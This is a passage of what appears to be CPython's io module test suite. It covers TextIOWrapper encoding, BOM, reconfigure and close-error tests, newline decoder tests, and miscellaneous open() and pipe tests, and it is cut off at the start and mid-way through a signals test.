self.assertEqual(f.read(), 'aaa'.encode(charset)) with self.open(filename, 'a', encoding=charset) as f: f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_seek_bom(self): # Same test, but when seeking manually filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'r+', encoding=charset) as f: f.seek(pos) f.write('zzz') f.seek(0) f.write('bbb') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'bbbzzz'.encode(charset)) def test_seek_append_bom(self): # Same test, but first seek to the start and then to the end filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') with self.open(filename, 'a', encoding=charset) as f: f.seek(0) f.seek(0, self.SEEK_END) f.write('xxx') with self.open(filename, 'rb') as f: self.assertEqual(f.read(), 'aaaxxx'.encode(charset)) def test_errors_property(self): with self.open(os_helper.TESTFN, "w") as f: self.assertEqual(f.errors, "strict") with self.open(os_helper.TESTFN, "w", errors="replace") as f: self.assertEqual(f.errors, "replace") @support.no_tracing def test_threads_write(self): # Issue6750: concurrent writes could duplicate data event = threading.Event() with self.open(os_helper.TESTFN, "w", buffering=1) as f: def run(n): text = "Thread%03d\n" % n event.wait() f.write(text) threads = [threading.Thread(target=run, args=(x,)) for x in range(20)] with threading_helper.start_threads(threads, event.set): time.sleep(0.02) with self.open(os_helper.TESTFN) as f: content = f.read() for n in range(20): self.assertEqual(content.count("Thread%03d\n" % n), 1) def test_flush_error_on_close(self): # Test that text file is closed despite failed flush # and that flush() is called before file closed. txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") closed = [] def bad_flush(): closed[:] = [txt.closed, txt.buffer.closed] raise OSError() txt.flush = bad_flush self.assertRaises(OSError, txt.close) # exception not swallowed self.assertTrue(txt.closed) self.assertTrue(txt.buffer.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) txt.flush = lambda: None # break reference loop def test_close_error_on_close(self): buffer = self.BytesIO(self.testdata) def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed txt.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 buffer = self.BytesIO(self.testdata) def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close buffer.close = bad_close txt = self.TextIOWrapper(buffer, encoding="ascii") txt.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed txt.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(txt.closed) # Silence destructor error buffer.close = lambda: None txt.flush = lambda: None def test_multi_close(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt.close() txt.close() txt.close() self.assertRaises(ValueError, txt.flush) def test_unseekable(self): txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata)) self.assertRaises(self.UnsupportedOperation, txt.tell) self.assertRaises(self.UnsupportedOperation, txt.seek, 0) def test_readonly_attributes(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") buf = self.BytesIO(self.testdata) with self.assertRaises(AttributeError): txt.buffer = buf def test_rawio(self): # Issue #12591: TextIOWrapper must work with raw I/O objects, so # that subprocess.Popen() can have the required unbuffered # semantics with universal_newlines=True. raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') # Reads self.assertEqual(txt.read(4), 'abcd') self.assertEqual(txt.readline(), 'efghi\n') self.assertEqual(list(txt), ['jkl\n', 'opq\n']) def test_rawio_write_through(self): # Issue #12591: with write_through=True, writes don't need a flush raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n']) txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n', write_through=True) txt.write('1') txt.write('23\n4') txt.write('5') self.assertEqual(b''.join(raw._write_stack), b'123\n45') def test_bufio_write_through(self): # Issue #21396: write_through=True doesn't force a flush() # on the underlying binary buffered object. flush_called, write_called = [], [] class BufferedWriter(self.BufferedWriter): def flush(self, *args, **kwargs): flush_called.append(True) return super().flush(*args, **kwargs) def write(self, *args, **kwargs): write_called.append(True) return super().write(*args, **kwargs) rawio = self.BytesIO() data = b"a" bufio = BufferedWriter(rawio, len(data)*2) textio = self.TextIOWrapper(bufio, encoding='ascii', write_through=True) # write to the buffered io but don't overflow the buffer text = data.decode('ascii') textio.write(text) # buffer.flush is not called with write_through=True self.assertFalse(flush_called) # buffer.write *is* called with write_through=True self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), b"") # no flush write_called = [] # reset textio.write(text * 10) # total content is larger than bufio buffer self.assertTrue(write_called) self.assertEqual(rawio.getvalue(), data * 11) # all flushed def test_reconfigure_write_through(self): raw = self.MockRawIO([]) t = self.TextIOWrapper(raw, encoding='ascii', newline='\n') t.write('1') t.reconfigure(write_through=True) # implied flush self.assertEqual(t.write_through, True) self.assertEqual(b''.join(raw._write_stack), b'1') t.write('23') self.assertEqual(b''.join(raw._write_stack), b'123') t.reconfigure(write_through=False) self.assertEqual(t.write_through, False) t.write('45') t.flush() self.assertEqual(b''.join(raw._write_stack), b'12345') # Keeping default value t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, False) t.reconfigure(write_through=True) t.reconfigure() t.reconfigure(write_through=None) self.assertEqual(t.write_through, True) def test_read_nonbytes(self): # Issue #17106 # Crash when underlying read() returns non-bytes t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read, 1) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.readline) t = self.TextIOWrapper(self.StringIO('a')) self.assertRaises(TypeError, t.read) def test_illegal_encoder(self): # Issue 31271: Calling write() while the return value of encoder's # encode() is invalid shouldn't cause an assertion failure. rot13 = codecs.lookup("rot13") with support.swap_attr(rot13, '_is_text_encoding', True): t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13") self.assertRaises(TypeError, t.write, 'bar') def test_illegal_decoder(self): # Issue #17106 # Bypass the early encoding check added in issue 20404 def _make_illegal_wrapper(): quopri = codecs.lookup("quopri") quopri._is_text_encoding = True try: t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n', encoding="quopri") finally: quopri._is_text_encoding = False return t # Crash when decoder returns non-string t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read, 1) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.readline) t = _make_illegal_wrapper() self.assertRaises(TypeError, t.read) # Issue 31243: calling read() while the return value of decoder's # getstate() is invalid should neither crash the interpreter nor # raise a SystemError. def _make_very_illegal_wrapper(getstate_ret_val): class BadDecoder: def getstate(self): return getstate_ret_val def _get_bad_decoder(dummy): return BadDecoder() quopri = codecs.lookup("quopri") with support.swap_attr(quopri, 'incrementaldecoder', _get_bad_decoder): return _make_illegal_wrapper() t = _make_very_illegal_wrapper(42) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper(()) self.assertRaises(TypeError, t.read, 42) t = _make_very_illegal_wrapper((1, 2)) self.assertRaises(TypeError, t.read, 42) def _check_create_at_shutdown(self, **kwargs): # Issue #20037: creating a TextIOWrapper at shutdown # shouldn't crash the interpreter. iomod = self.io.__name__ code = """if 1: import codecs import {iomod} as io # Avoid looking up codecs at shutdown codecs.lookup('utf-8') class C: def __init__(self): self.buf = io.BytesIO() def __del__(self): io.TextIOWrapper(self.buf, **{kwargs}) print("ok") c = C() """.format(iomod=iomod, kwargs=kwargs) return assert_python_ok("-c", code) def test_create_at_shutdown_without_encoding(self): rc, out, err = self._check_create_at_shutdown() if err: # Can error out with a RuntimeError if the module state # isn't found. self.assertIn(self.shutdown_error, err.decode()) else: self.assertEqual("ok", out.decode().strip()) def test_create_at_shutdown_with_encoding(self): rc, out, err = self._check_create_at_shutdown(encoding='utf-8', errors='strict') self.assertFalse(err) self.assertEqual("ok", out.decode().strip()) def test_read_byteslike(self): r = MemviewBytesIO(b'Just some random string\n') t = self.TextIOWrapper(r, 'utf-8') # TextIOwrapper will not read the full string, because # we truncate it to a multiple of the native int size # so that we can construct a more complex memoryview. bytes_val = _to_memoryview(r.getvalue()).tobytes() self.assertEqual(t.read(200), bytes_val.decode('utf-8')) def test_issue22849(self): class F(object): def readable(self): return True def writable(self): return True def seekable(self): return True for i in range(10): try: self.TextIOWrapper(F(), encoding='utf-8') except Exception: pass F.tell = lambda x: 0 t = self.TextIOWrapper(F(), encoding='utf-8') def test_reconfigure_encoding_read(self): # latin1 -> utf8 # (latin1 can decode utf-8 encoded string) data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8') raw = self.BytesIO(data) txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') self.assertEqual(txt.readline(), 'abc\xe9\n') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(encoding='utf-8') with self.assertRaises(self.UnsupportedOperation): txt.reconfigure(newline=None) def test_reconfigure_write_fromascii(self): # ascii has a specific encodefunc in the C implementation, # but utf-8-sig has not. Make sure that we get rid of the # cached encodefunc when we switch encoders. raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('foo\n') txt.reconfigure(encoding='utf-8-sig') txt.write('\xe9\n') txt.flush() self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n') def test_reconfigure_write(self): # latin -> utf8 raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n') txt.write('abc\xe9\n') txt.reconfigure(encoding='utf-8') self.assertEqual(raw.getvalue(), b'abc\xe9\n') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n') # ascii -> utf-8-sig: ensure that no BOM is written in the middle of # the file raw = self.BytesIO() txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n') def test_reconfigure_write_non_seekable(self): raw = self.BytesIO() raw.seekable = lambda: False raw.seek = None txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n') txt.write('abc\n') txt.reconfigure(encoding='utf-8-sig') txt.write('d\xe9f\n') txt.flush() # If the raw stream is not seekable, there'll be a BOM self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n') def test_reconfigure_defaults(self): txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n') txt.reconfigure(encoding=None) self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.write('LF\n') txt.reconfigure(newline='\r\n') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'replace') txt.reconfigure(errors='ignore') self.assertEqual(txt.encoding, 'ascii') self.assertEqual(txt.errors, 'ignore') txt.write('CRLF\n') txt.reconfigure(encoding='utf-8', newline=None) self.assertEqual(txt.errors, 'strict') txt.seek(0) self.assertEqual(txt.read(), 'LF\nCRLF\n') self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n') def test_reconfigure_newline(self): raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline=None) self.assertEqual(txt.readline(), 'CR\n') raw = self.BytesIO(b'CR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='') self.assertEqual(txt.readline(), 'CR\r') raw = self.BytesIO(b'CR\rLF\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\n') self.assertEqual(txt.readline(), 'CR\rLF\n') raw = self.BytesIO(b'LF\nCR\rEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\n') txt.reconfigure(newline='\r') self.assertEqual(txt.readline(), 'LF\nCR\r') raw = self.BytesIO(b'CR\rCRLF\r\nEOF') txt = self.TextIOWrapper(raw, 'ascii', newline='\r') txt.reconfigure(newline='\r\n') self.assertEqual(txt.readline(), 'CR\rCRLF\r\n') txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r') txt.reconfigure(newline=None) txt.write('linesep\n') txt.reconfigure(newline='') txt.write('LF\n') txt.reconfigure(newline='\n') txt.write('LF\n') txt.reconfigure(newline='\r') txt.write('CR\n') txt.reconfigure(newline='\r\n') txt.write('CRLF\n') expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n' self.assertEqual(txt.detach().getvalue().decode('ascii'), expected) def test_issue25862(self): # Assertion failures occurred in tell() after read() and write(). t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii') t.read(1) t.read() t.tell() t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii') t.read(1) t.write('x') t.tell() class MemviewBytesIO(io.BytesIO): '''A BytesIO object whose read method returns memoryviews rather than bytes''' def read1(self, len_): return _to_memoryview(super().read1(len_)) def read(self, len_): return _to_memoryview(super().read(len_)) def _to_memoryview(buf): '''Convert bytes-object *buf* to a non-trivial memoryview''' arr = array.array('i') idx = len(buf) - len(buf) % arr.itemsize arr.frombytes(buf[:idx]) return memoryview(arr) class CTextIOWrapperTest(TextIOWrapperTest): io = io shutdown_error = "LookupError: unknown encoding: ascii" def test_initialization(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') self.assertRaises(ValueError, t.read) t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) def test_garbage_collection(self): # C TextIOWrapper objects are collected, and collecting them flushes # all data to disk. # The Python version has __del__, so it ends in gc.garbage instead. with warnings_helper.check_warnings(('', ResourceWarning)): rawio = io.FileIO(os_helper.TESTFN, "wb") b = self.BufferedWriter(rawio) t = self.TextIOWrapper(b, encoding="ascii") t.write("456def") t.x = t wr = weakref.ref(t) del t support.gc_collect() self.assertIsNone(wr(), wr) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"456def") def test_rwpair_cleared_before_textio(self): # Issue 13070: TextIOWrapper's finalization would crash when called # after the reference to the underlying BufferedRWPair's writer got # cleared by the GC. for i in range(1000): b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t1 = self.TextIOWrapper(b1, encoding="ascii") b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()) t2 = self.TextIOWrapper(b2, encoding="ascii") # circular references t1.buddy = t2 t2.buddy = t1 support.gc_collect() def test_del__CHUNK_SIZE_SystemError(self): t = self.TextIOWrapper(self.BytesIO(), encoding='ascii') with self.assertRaises(AttributeError): del t._CHUNK_SIZE class PyTextIOWrapperTest(TextIOWrapperTest): io = pyio shutdown_error = "LookupError: unknown encoding: ascii" class IncrementalNewlineDecoderTest(unittest.TestCase): def check_newline_decoding_utf8(self, decoder): # UTF-8 specific tests for a newline decoder def _check_decode(b, s, **kwargs): # We exercise getstate() / setstate() as well as decode() state = decoder.getstate() self.assertEqual(decoder.decode(b, **kwargs), s) decoder.setstate(state) self.assertEqual(decoder.decode(b, **kwargs), s) _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") _check_decode(b'\xa2', "") _check_decode(b'\x88', "\u8888") _check_decode(b'\xe8', "") self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True) decoder.reset() _check_decode(b'\n', "\n") _check_decode(b'\r', "") _check_decode(b'', "\n", final=True) _check_decode(b'\r', "\n", final=True) _check_decode(b'\r', "") _check_decode(b'a', "\na") _check_decode(b'\r\r\n', "\n\n") _check_decode(b'\r', "") _check_decode(b'\r', "\n") _check_decode(b'\na', "\na") _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n") _check_decode(b'\xe8\xa2\x88', "\u8888") _check_decode(b'\n', "\n") _check_decode(b'\xe8\xa2\x88\r', "\u8888") _check_decode(b'\n', "\n") def check_newline_decoding(self, decoder, encoding): result = [] if encoding is not None: encoder = codecs.getincrementalencoder(encoding)() def _decode_bytewise(s): # Decode one byte at a time for b in encoder.encode(s): result.append(decoder.decode(bytes([b]))) else: encoder = None def _decode_bytewise(s): # Decode one char at a time for c in s: result.append(decoder.decode(c)) self.assertEqual(decoder.newlines, None) _decode_bytewise("abc\n\r") self.assertEqual(decoder.newlines, '\n') _decode_bytewise("\nabc") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual(decoder.newlines, ('\n', '\r\n')) _decode_bytewise("abc") self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n')) _decode_bytewise("abc\r") self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc") decoder.reset() input = "abc" if encoder is not None: encoder.reset() input = encoder.encode(input) self.assertEqual(decoder.decode(input), "abc") self.assertEqual(decoder.newlines, None) def test_newline_decoder(self): encodings = ( # None meaning the IncrementalNewlineDecoder takes unicode input # rather than bytes input None, 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) for enc in encodings: decoder = enc and codecs.getincrementaldecoder(enc)() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding(decoder, enc) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding_utf8(decoder) self.assertRaises(TypeError, decoder.setstate, 42) def test_newline_bytes(self): # Issue 5433: Excessive optimization in IncrementalNewlineDecoder def _check(dec): self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0D00"), "\u0D00") self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0A00"), "\u0A00") self.assertEqual(dec.newlines, None) dec = self.IncrementalNewlineDecoder(None, translate=False) _check(dec) dec = self.IncrementalNewlineDecoder(None, translate=True) _check(dec) def test_translate(self): # issue 35062 for translate in (-2, -1, 1, 2): decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate) self.check_newline_decoding_utf8(decoder) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=0) self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n") class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass # XXX Tests for open() class MiscIOTest(unittest.TestCase): def tearDown(self): os_helper.unlink(os_helper.TESTFN) def test___all__(self): for name in self.io.__all__: obj = getattr(self.io, name, None) self.assertIsNotNone(obj, name) if name in ("open", "open_code"): continue elif "error" in name.lower() or name == "UnsupportedOperation": self.assertTrue(issubclass(obj, Exception), name) elif not name.startswith("SEEK_"): self.assertTrue(issubclass(obj, self.IOBase)) def test_attributes(self): f = self.open(os_helper.TESTFN, "wb", buffering=0) self.assertEqual(f.mode, "wb") f.close() with warnings_helper.check_warnings(('', DeprecationWarning)): f = self.open(os_helper.TESTFN, "U") self.assertEqual(f.name, os_helper.TESTFN) self.assertEqual(f.buffer.name, os_helper.TESTFN) self.assertEqual(f.buffer.raw.name, os_helper.TESTFN) self.assertEqual(f.mode, "U") self.assertEqual(f.buffer.mode, "rb") self.assertEqual(f.buffer.raw.mode, "rb") f.close() f = self.open(os_helper.TESTFN, "w+") self.assertEqual(f.mode, "w+") self.assertEqual(f.buffer.mode, "rb+") # Does it really matter? self.assertEqual(f.buffer.raw.mode, "rb+") g = self.open(f.fileno(), "wb", closefd=False) self.assertEqual(g.mode, "wb") self.assertEqual(g.raw.mode, "wb") self.assertEqual(g.name, f.fileno()) self.assertEqual(g.raw.name, f.fileno()) f.close() g.close() def test_open_pipe_with_append(self): # bpo-27805: Ignore ESPIPE from lseek() in open(). r, w = os.pipe() self.addCleanup(os.close, r) f = self.open(w, 'a') self.addCleanup(f.close) # Check that the file is marked non-seekable. On Windows, however, lseek # somehow succeeds on pipes. if sys.platform != 'win32': self.assertFalse(f.seekable()) def test_io_after_close(self): for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "w", "buffering": 1}, {"mode": "w", "buffering": 2}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "r", "buffering": 1}, {"mode": "r", "buffering": 2}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+", "buffering": 1}, {"mode": "w+", "buffering": 2}, {"mode": "w+b", "buffering": 0}, ]: f = self.open(os_helper.TESTFN, **kwargs) f.close() self.assertRaises(ValueError, f.flush) self.assertRaises(ValueError, f.fileno) self.assertRaises(ValueError, f.isatty) self.assertRaises(ValueError, f.__iter__) if hasattr(f, "peek"): self.assertRaises(ValueError, f.peek, 1) self.assertRaises(ValueError, f.read) if hasattr(f, "read1"): self.assertRaises(ValueError, f.read1, 1024) self.assertRaises(ValueError, f.read1) if hasattr(f, "readall"): self.assertRaises(ValueError, f.readall) if hasattr(f, "readinto"): self.assertRaises(ValueError, f.readinto, bytearray(1024)) if hasattr(f, "readinto1"): self.assertRaises(ValueError, f.readinto1, bytearray(1024)) self.assertRaises(ValueError, f.readline) self.assertRaises(ValueError, f.readlines) self.assertRaises(ValueError, f.readlines, 1) self.assertRaises(ValueError, f.seek, 0) self.assertRaises(ValueError, f.tell) self.assertRaises(ValueError, f.truncate) self.assertRaises(ValueError, f.write, b"" if "b" in kwargs['mode'] else "") self.assertRaises(ValueError, f.writelines, []) self.assertRaises(ValueError, next, f) def test_blockingioerror(self): # Various BlockingIOError issues class C(str): pass c = C("") b = self.BlockingIOError(1, c) c.b = b b.c = c wr = weakref.ref(c) del c, b support.gc_collect() self.assertIsNone(wr(), wr) def test_abcs(self): # Test the visible base classes are ABCs. self.assertIsInstance(self.IOBase, abc.ABCMeta) self.assertIsInstance(self.RawIOBase, abc.ABCMeta) self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta) self.assertIsInstance(self.TextIOBase, abc.ABCMeta) def _check_abc_inheritance(self, abcmodule): with self.open(os_helper.TESTFN, "wb", buffering=0) as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(os_helper.TESTFN, "wb") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(os_helper.TESTFN, "w") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertIsInstance(f, abcmodule.TextIOBase) def test_abc_inheritance(self): # Test implementations inherit from their respective ABCs self._check_abc_inheritance(self) def test_abc_inheritance_official(self): # Test implementations inherit from the official ABCs of the # baseline "io" module. self._check_abc_inheritance(io) def _check_warn_on_dealloc(self, *args, **kwargs): f = open(*args, **kwargs) r = repr(f) with self.assertWarns(ResourceWarning) as cm: f = None support.gc_collect() self.assertIn(r, str(cm.warning.args[0])) def test_warn_on_dealloc(self): self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0) self._check_warn_on_dealloc(os_helper.TESTFN, "wb") self._check_warn_on_dealloc(os_helper.TESTFN, "w") def _check_warn_on_dealloc_fd(self, *args, **kwargs): fds = [] def cleanup_fds(): for fd in fds: try: os.close(fd) except OSError as e: if e.errno != errno.EBADF: raise self.addCleanup(cleanup_fds) r, w = os.pipe() fds += r, w self._check_warn_on_dealloc(r, *args, **kwargs) # When using closefd=False, there's no warning r, w = os.pipe() fds += r, w with warnings_helper.check_no_resource_warning(self): open(r, *args, closefd=False, **kwargs) def test_warn_on_dealloc_fd(self): self._check_warn_on_dealloc_fd("rb", buffering=0) self._check_warn_on_dealloc_fd("rb") self._check_warn_on_dealloc_fd("r") def test_pickling(self): # Pickling file objects is forbidden for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+b", "buffering": 0}, ]: for protocol in range(pickle.HIGHEST_PROTOCOL + 1): with self.open(os_helper.TESTFN, **kwargs) as f: self.assertRaises(TypeError, pickle.dumps, f, protocol) def test_nonblock_pipe_write_bigbuf(self): self._test_nonblock_pipe_write(16*1024) def test_nonblock_pipe_write_smallbuf(self): self._test_nonblock_pipe_write(1024) @unittest.skipUnless(hasattr(os, 'set_blocking'), 'os.set_blocking() required for this test') def _test_nonblock_pipe_write(self, bufsize): sent = [] received = [] r, w = os.pipe() os.set_blocking(r, False) os.set_blocking(w, False) # To exercise all code paths in the C implementation we need # to play with buffer sizes. For instance, if we choose a # buffer size less than or equal to _PIPE_BUF (4096 on Linux) # then we will never get a partial write of the buffer. rf = self.open(r, mode='rb', closefd=True, buffering=bufsize) wf = self.open(w, mode='wb', closefd=True, buffering=bufsize) with rf, wf: for N in 9999, 73, 7574: try: i = 0 while True: msg = bytes([i % 26 + 97]) * N sent.append(msg) wf.write(msg) i += 1 except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) sent[-1] = sent[-1][:e.characters_written] received.append(rf.read()) msg = b'BLOCKED' wf.write(msg) sent.append(msg) while True: try: wf.flush() break except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) self.assertEqual(e.characters_written, 0) received.append(rf.read()) received += iter(rf.read, None) sent, received = b''.join(sent), b''.join(received) self.assertEqual(sent, received) self.assertTrue(wf.closed) self.assertTrue(rf.closed) def test_create_fail(self): # 'x' mode fails if file is existing with self.open(os_helper.TESTFN, 'w'): pass self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x') def test_create_writes(self): # 'x' mode opens for writing with self.open(os_helper.TESTFN, 'xb') as f: f.write(b"spam") with self.open(os_helper.TESTFN, 'rb') as f: self.assertEqual(b"spam", f.read()) def test_open_allargs(self): # there used to be a buffer overflow in the parser for rawmode self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+') def test_check_encoding_errors(self): # bpo-37388: open() and TextIOWrapper must check encoding and errors # arguments in dev mode mod = self.io.__name__ filename = __file__ invalid = 'Boom, Shaka Laka, Boom!' code = textwrap.dedent(f''' import sys from {mod} import open, TextIOWrapper try: open({filename!r}, encoding={invalid!r}) except LookupError: pass else: sys.exit(21) try: open({filename!r}, errors={invalid!r}) except LookupError: pass else: sys.exit(22) fp = open({filename!r}, "rb") with fp: try: TextIOWrapper(fp, encoding={invalid!r}) except LookupError: pass else: sys.exit(23) try: TextIOWrapper(fp, errors={invalid!r}) except LookupError: pass else: sys.exit(24) sys.exit(10) ''') proc = assert_python_failure('-X', 'dev', '-c', code) self.assertEqual(proc.rc, 10, proc) class CMiscIOTest(MiscIOTest): io = io def test_readinto_buffer_overflow(self): # Issue #18025 class BadReader(self.io.BufferedIOBase): def read(self, n=-1): return b'x' * 10**6 bufio = BadReader() b = bytearray(2) self.assertRaises(ValueError, bufio.readinto, b) def check_daemon_threads_shutdown_deadlock(self, stream_name): # Issue #23309: deadlocks at shutdown should be avoided when a # daemon thread and the main thread both write to a file. code = """if 1: import sys import time import threading from test.support import SuppressCrashReport file = sys.{stream_name} def run(): while True: file.write('.') file.flush() crash = SuppressCrashReport() crash.__enter__() # don't call __exit__(): the crash occurs at Python shutdown thread = threading.Thread(target=run) thread.daemon = True thread.start() time.sleep(0.5) file.write('!') file.flush() """.format_map(locals()) res, _ = run_python_until_end("-c", code) err = res.err.decode() if res.rc != 0: # Failure: should be a fatal error pattern = (r"Fatal Python error: _enter_buffered_busy: " r"could not acquire lock " r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> " r"at interpreter shutdown, possibly due to " r"daemon threads".format_map(locals())) self.assertRegex(err, pattern) else: self.assertFalse(err.strip('.!')) def test_daemon_threads_shutdown_stdout_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stdout') def test_daemon_threads_shutdown_stderr_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stderr') class PyMiscIOTest(MiscIOTest): io = pyio @unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.') class SignalsTest(unittest.TestCase): def setUp(self): self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt) def tearDown(self): signal.signal(signal.SIGALRM, self.oldalrm) def alarm_interrupt(self, sig, frame): 1/0 def check_interrupted_write(self, item, bytes, **fdopen_kwargs): """Check that a partial write, when it gets interrupted, properly invokes the signal handler, and bubbles up the exception raised in the latter.""" read_results = [] def _read(): s = os.read(r, 1) read_results.append(s) t = threading.Thread(target=_read) t.daemon = True r, w = os.pipe() fdopen_kwargs["closefd"] = False large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1) try: wio = self.io.open(w, **fdopen_kwargs) if hasattr(signal, 